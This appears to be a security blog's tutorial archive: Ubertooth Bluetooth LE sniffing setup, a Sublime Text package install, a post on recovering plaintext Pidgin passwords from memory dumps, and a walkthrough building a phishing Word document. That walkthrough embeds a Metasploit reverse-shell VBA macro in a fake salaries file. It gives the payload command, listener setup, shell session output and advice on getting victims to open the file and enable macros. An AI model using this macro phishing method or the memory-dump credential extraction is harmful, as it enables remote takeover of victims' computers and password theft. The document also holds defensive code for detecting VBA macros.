Category Archives: Tutorial

Setting up Ubertooth One – Kali

Install essential packages and updates
Login to Kali as root/toor
apt-get update
apt-get install kali-linux-sdr
apt-get install cmake libusb-1.0-0-dev make gcc g++ libbluetooth-dev pkg-config libpcap-dev python-numpy python-pyside python-qt4 libgtk2.0-dev libusb-dev bluez

Install the Bluetooth baseband decoding library
wget https://github.com/greatscottgadgets/libbtbb/archive/2015-10-R1.tar.gz -O libbtbb-2015-10-R1.tar.gz
tar xf libbtbb-2015-10-R1.tar.gz
cd libbtbb-2015-10-R1
mkdir build
cd build
cmake ..
make
make install
ldconfig

Install Ubertooth tools
wget https://github.com/greatscottgadgets/ubertooth/releases/download/2015-10-R1/ubertooth-2015-10-R1.tar.xz -O ubertooth-2015-10-R1.tar.xz
tar xf ubertooth-2015-10-R1.tar.xz
cd ubertooth-2015-10-R1/host
mkdir build
cd build
cmake ..
make
make install
ldconfig

Visualizing the 2.4 GHz spectrum
git clone https://www.kismetwireless.net/spectools.git
cd spectools
./configure
make
make install
spectool_gtk

The last command opens WiSPY. Click “Open Device”, select “Ubertooth One USB” and click Enable. If you do not see anything in the three views (Spectral, Topo, Planar), try physically disconnecting and reconnecting the Ubertooth One.

Screenshot: activity in progress, a file is downloading.

Screenshot: activity done, the file download has completed.

Determine the installed firmware version
# ubertooth-util -V
ubertooth 2015-10-R1 (dominicgs@hydrogen) Mon Oct 12 22:30:57 BST 2015

Known Limitations
The BLE sniffer can only scan one of the three advertising channels at a time (channel 37 on 2402 MHz, channel 38 on 2426 MHz and channel 39 on 2480 MHz). This is a hardware limitation: the Ubertooth has a single narrowband radio chip (the CC2400) that can only be tuned to one frequency at a time. So when sniffing the BLE advertising channels you have a 33.3% chance of being on the correct channel for a specific connection. The workaround is either to keep trying until you happen to be on the right channel at the right time, or to use 3 Ubertooth dongles, each tuned to monitor 1 of the advertising channels.

Sniff Bluetooth LE Packets
1. Using the default Linux Bluetooth utilities: # /etc/init.d/bluetooth restart && hcitool dev && hcitool scan
2. Using ubertooth-scan from the Ubertooth utilities: # ubertooth-scan -b hci1 -t 40 -x
3. Using ubertooth-btle from the Ubertooth utilities to capture Bluetooth LE (Low Energy) traffic in promiscuous mode:
# ubertooth-btle -p
Sample output:
systime=1481409606 freq=2440 addr=f605c0cd delta_t=24.492 ms
61 bc ed 3c 9e 14 c7 f9 17 3e 44 7d 83 8f 9d 38 2f f8 e5 7d 68 13 a5 42 db ce 67 54 c6 7b c9 d2 67 df 98 40 d1 e4 02 db 18 4c 52 6f c8 0d
Data / AA f605c0cd (valid) / 28 bytes
Channel Index: 17
LLID: 1 / LL Data PDU / empty or L2CAP continuation
NESN: 0 SN: 0 MD: 0

Data: ed 3c 9e 14 c7 f9 17 3e 44 7d 83 8f 9d 38 2f f8 e5 7d 68 13 a5 42 db ce 67 54 c6 7b
CRC: c9 d2 67

4. Using ubertooth-btle again, this time saving the traffic to a PCAP file for later examination:
# ubertooth-btle -p -c /tmp/capture.pcap

5. Using ubertooth-btle again, observe the traffic in real time (you have a 1 in 3 chance of being on the correct advertising channel, due to the Known Limitation described earlier):
# mkfifo /tmp/fifopipe0
# ubertooth-btle -f -c /tmp/fifopipe0 &

Open Wireshark | click Capture | Options | click the “Manage Interfaces” button on the right side of the window | click the “New” button | in the “Pipe” text box, type “/tmp/fifopipe0” | click Save | click Close | click “Start”

or, launch Wireshark from command line as:
# wireshark -k -i /tmp/fifopipe0 &

6. If you have 3 Ubertooth devices you can overcome the limitation described in the “Known Limitations” section and monitor all 3 advertising channels:

# mkfifo /tmp/fifopipe0 && mkfifo /tmp/fifopipe1 && mkfifo /tmp/fifopipe2
# ubertooth-btle -U0 -A37 -f -c /tmp/fifopipe0 &
# ubertooth-btle -U1 -A38 -f -c /tmp/fifopipe1 &
# ubertooth-btle -U2 -A39 -f -c /tmp/fifopipe2 &

then, either launch Wireshark from command line as:
# wireshark -k -i /tmp/fifopipe0 -i /tmp/fifopipe1 -i /tmp/fifopipe2 &

or,
Open Wireshark | click Capture | Options | click the “Manage Interfaces” button on the right side of the window | click the “New” button | in the “Pipe” text box, type “/tmp/fifopipe0”, repeat for “/tmp/fifopipe1” and “/tmp/fifopipe2” | click Save | click Close | click “Start”
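As an added example (not part of the original post), the following Python decodes the raw hex line from the step 3 sample output into the fields ubertooth-btle prints below it, and maps the capture frequency to the channel index; the mapping also covers the three advertising channels from the Known Limitations section. The sample bytes are the packet shown above, and the field layout is the Bluetooth 4.x data-channel PDU header.

```python
# Added example, not from the original post: decode one raw ubertooth-btle
# line into the fields the tool prints underneath it.  The sample is the
# packet shown in step 3 above (freq=2440, AA f605c0cd), pasted verbatim.

BLE_SAMPLE_FREQ = 2440
BLE_SAMPLE_RAW = ("61 bc ed 3c 9e 14 c7 f9 17 3e 44 7d 83 8f 9d 38 2f f8 e5 7d "
                  "68 13 a5 42 db ce 67 54 c6 7b c9 d2 67 df 98 40 d1 e4 02 db "
                  "18 4c 52 6f c8 0d")

LLID_NAMES = {1: "LL Data PDU / empty or L2CAP continuation",
              2: "LL Data PDU / L2CAP start", 3: "LL Control PDU"}

# The three advertising channels from the Known Limitations section.
ADV_CHANNELS = {2402: 37, 2426: 38, 2480: 39}


def channel_index(freq_mhz):
    """Map a centre frequency to the BLE channel index ubertooth-btle prints.

    RF channels run 0..39 in 2 MHz steps from 2402 MHz; three of them are
    advertising channels, the other 37 are data channels 0..36.
    """
    if freq_mhz in ADV_CHANNELS:
        return ADV_CHANNELS[freq_mhz]
    rf = (freq_mhz - 2402) // 2
    return rf - 1 if rf < 12 else rf - 2   # skip RF 0 (ch 37) and RF 12 (ch 38)


def parse_data_pdu(raw_hex):
    """Split a raw data-channel PDU into header fields, payload and CRC.

    Byte 0 is the data header (LLID bits 0-1, NESN bit 2, SN bit 3, MD bit 4);
    byte 1 holds the payload length in its low 5 bits.  A 24-bit CRC follows
    the payload; anything after it is noise the sniffer also captured.
    """
    b = bytes.fromhex(raw_hex)
    hdr, length = b[0], b[1] & 0x1F
    llid = hdr & 0x03
    return {
        "llid": llid,
        "llid_name": LLID_NAMES.get(llid, "reserved"),
        "nesn": (hdr >> 2) & 1,
        "sn": (hdr >> 3) & 1,
        "md": (hdr >> 4) & 1,
        "length": length,
        "payload": b[2:2 + length].hex(" "),
        "crc": b[2 + length:5 + length].hex(" "),
        "is_empty_pdu": llid == 1 and length == 0,  # keep-alive that filter 2 drops
    }
```

The CRC cannot be verified here because the 24-bit CRC is initialised with the CRCInit value negotiated in the connection request, which this capture did not see.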

Viewing Bluetooth Packets in Wireshark
# wireshark /tmp/capture.pcap
go to Edit | Preferences | Protocols | select DLT_USER and click on Edit… | click on “+” to add | ensure the new value reads “User 0 (DLT=147)” | in the “Payload protocol” column enter “btle” | OK | OK

Useful Wireshark filters
1. Connection requests and non-zero data packets:
btle.data_header.length > 0 || btle.advertising_header.pdu_type == 0x05

2. Ignore empty PDUs (keep-alive packets):
not btle.data_header.llid==0001


Syntax highlight support for NASM x86 Assembly code in Sublime Text 3

Open the Sublime Text 3 console with the shortcut Ctrl+` and paste the code below, followed by Enter:

import urllib.request,os,hashlib; h = 'eb2297e1a458f27d836c04bb0cbaf282' + 'd0e7a3098092775ccb37ca9d6b2e4b7d'; pf = 'Package Control.sublime-package'; ipp = sublime.installed_packages_path(); urllib.request.install_opener( urllib.request.build_opener( urllib.request.ProxyHandler()) ); by = urllib.request.urlopen( 'http://packagecontrol.io/' + pf.replace(' ', '%20')).read(); dh = hashlib.sha256(by).hexdigest(); print('Error validating download (got %s instead of %s), please try manual install' % (dh, h)) if dh != h else open(os.path.join( ipp, pf), 'wb' ).write(by)

Screenshot: the code pasted into the Sublime Text console window.

Then press Shift+Cmd+P, type “package control: install package”, select it and press the Enter key:
Screenshot: the Package Control command palette.

In the text area type “NASM x86 Assembly” and select the first (and only) result from the list to add the package:
Screenshot: the package search result.

Last, open your assembly file, go to the Sublime Text 3 menu View | Syntax | Assembly (x86) NASM and enjoy the coloured syntax.


The MS Office, a Macro and a Shell

In this post we will go through the steps to create a VBA (Visual Basic for Applications) payload using the Metasploit Framework and embed it in a Microsoft Office Word 2003 document. When the target users open the document we get a command prompt. The process is divided into four parts.

Part1 – Payload generation
./msfpayload windows/shell_reverse_tcp LPORT=5000 LHOST=192.168.1.108 V > /var/www/win.sh_rev_tcp.1.108-5000.txt

Part2 – Attacker’s end-point preparation
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.108
LHOST => 192.168.1.108
msf exploit(handler) > set LPORT 5000
LPORT => 5000
msf exploit(handler) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler…

[The pentester waits here for the victim to take the bait; once the file is opened a shell is spawned as follows]

[*] Command shell session 1 opened (192.168.1.108:5000 -> 192.168.1.106:1040)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>systeminfo
systeminfo

Host Name: WINXP
OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Build 2600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation


C:\Documents and Settings\Administrator>


Part3 – Wrap bait into Office Word document
a. First, we need to copy the contents of the file win.sh_rev_tcp.1.108-5000.txt, generated in Part1, over to our Windows machine. Having a web server on the Linux side is always handy: we just open Firefox and point it at http://192.168.1.108/win.sh_rev_tcp.1.108-5000.txt
b. Now, create a new MS Office Word 2003 document and name it StaffSalaries2009.doc.
c. Open the new document, go to Tools | Macro | Visual Basic Editor
d. On the left hand side, double click on the ThisDocument icon; the area where you should paste the code will pop up in the middle of the screen
e. Paste the code from win.sh_rev_tcp.1.108-5000.txt
f. Save the script into the document by clicking the Save icon on the toolbar, then do File | Close and Return to Microsoft Word
g. Add some data to your phishing document so that it looks genuine, then Save and Exit
h. Distribute the document and wait

* The above also applies to Office Excel documents; note, however, that the generated Visual Basic code should be saved into the ThisWorkbook item instead of ThisDocument in step d.

Part4 – Distribution etc
Having done all this, you can send the file as an attachment or save it to a shared area where your victims can spot it and open it. If their Macro Security level (Tools | Macro | Security…) is set to Low, your goal is achieved instantly. In any other case the users get a friendly message telling them “The macros in this project are disabled. Please refer to the online help or documentation of the host application to determine how to enable macros.” with an OK and a Help button; pressing the Help button tells them exactly where to click to enable macros.
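As an added check from the defender's side (example code, not part of the original post), the following Python flags a Word or Excel binary document that carries a VBA project like the one built in Part3, by scanning the raw OLE2 container for the directory-entry names Office uses for VBA storage. The sample input is constructed with the fake_ole helper; the stream and storage names are the standard ones Office writes, and the scan is a heuristic rather than a full OLE parse.

```python
# Added example, not from the original post: a triage check for the kind of
# macro-carrying .doc/.xls built above.  It scans the raw OLE2 container for
# the UTF-16LE directory-entry names that only exist when a VBA project is
# stored in the file.  Heuristic only; use a real OLE parser (e.g. olefile)
# when you need more than a quick yes/no.

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"

# Storage/stream names that show up in the OLE directory when VBA is present.
VBA_MARKERS = ("Macros", "_VBA_PROJECT_CUR", "_VBA_PROJECT",
               "ThisDocument", "ThisWorkbook")


def find_vba_markers(data):
    """Return the VBA-related names found in an OLE2 file ([] for non-OLE input)."""
    if not data.startswith(OLE_MAGIC):
        return []
    # Directory entry names are stored as NUL-terminated UTF-16LE strings.
    return [n for n in VBA_MARKERS if n.encode("utf-16-le") + b"\x00\x00" in data]


def has_vba_project(data):
    """True when the container carries a VBA project, i.e. the file has macros."""
    return "_VBA_PROJECT" in find_vba_markers(data)


def fake_ole(names):
    """Constructed stand-in for a real file: OLE header followed by entry names."""
    entries = b"".join(n.encode("utf-16-le") + b"\x00\x00" + b"\x00" * 16
                       for n in names)
    return OLE_MAGIC + b"\x00" * 504 + entries


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            hits = find_vba_markers(fh.read())
        print(path, "->", ("VBA: " + ", ".join(hits)) if hits else "no VBA markers")
```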


IM Memory Dumping (cont.)

(You may want to read first IM Memory Dumping)

According to Wikipedia, on April 6th 2007 GAIM’s project development team changed the name of the popular IM to Pidgin, as a result of their settlement with AOL and the latter’s trademarked acronym AIM. So we downloaded Pidgin’s latest version 2.5.5 and installed it in our VMware Windows box. We happily added our demo username and password (for our test it does not matter whether you tick the box saying remember password or not, as there is no change in the result of our experiment). Then we dumped Pidgin’s process memory and saved it to a file on our Samba share; the file consumed about 50MB of space. From there, using the strings command we searched for sequences of printable characters; by grep-ing for our set password we found three instances of it in different places (all of them, of course, in plaintext).

We changed our account password a few times and repeated the process again and again; finally we concluded that:
1. every time, the password was stored three times in the process memory
2. one of the locations is very easily spotted in the dump (if you view the file with a hex editor you will see that there is always a large block of random data, then the string =p&=, then some random numbers (which do not always appear) and finally our password). As you understand, even if you do not know the secret password you can find it by trial and error in just a few tries.

I guess that other IM clients are very likely to store your passwords, amongst other information, in the clear. I cannot tell you not to use program X or program Y because they do not properly encrypt your passwords or do not scrub the memory, but I can advise you to take under serious consideration which ones you use at home and at work, and think about how exposed you are.
